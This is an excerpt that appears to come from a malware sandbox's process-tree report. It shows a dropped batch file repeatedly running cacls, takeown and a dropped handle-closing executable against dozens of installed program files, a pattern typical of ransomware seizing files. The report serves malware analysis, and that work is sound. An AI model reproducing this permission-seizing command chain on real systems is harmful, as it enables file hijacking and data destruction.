C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵
- Loads dropped DLL
PID:1960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "eng.hyp" -nobanner3⤵
- Loads dropped DLL
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "eng.hyp" -nobanner4⤵
- Executes dropped EXE
PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵
- Loads dropped DLL
PID:1368 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "icudt26l.dat" -nobanner3⤵
- Loads dropped DLL
PID:1052 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "icudt26l.dat" -nobanner4⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵
- Loads dropped DLL
PID:1512 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ICELAND.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ICELAND.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵
- Loads dropped DLL
PID:1128 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1252.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1252.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:896 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵
- Loads dropped DLL
PID:1928 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "wabmig.exe" -nobanner3⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:1820 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:760 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵
- Loads dropped DLL
PID:216 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵
- Loads dropped DLL
PID:652 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵
- Loads dropped DLL
PID:700 -
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵
- Executes dropped EXE
PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Shorthand.jtp" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Shorthand.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "license.html" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "license.html" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "pmd.cer" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "pmd.cer" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "form_responses.gif" -nobanner3⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "form_responses.gif" -nobanner4⤵PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:984
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:1812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "server_ok.gif" -nobanner3⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "server_ok.gif" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵
- Modifies file permissions
PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "brt.hyp" -nobanner3⤵PID:1384
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "brt.hyp" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵
- Modifies file permissions
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "can32.clx" -nobanner3⤵PID:1896
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "can32.clx" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:992
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:1968
-
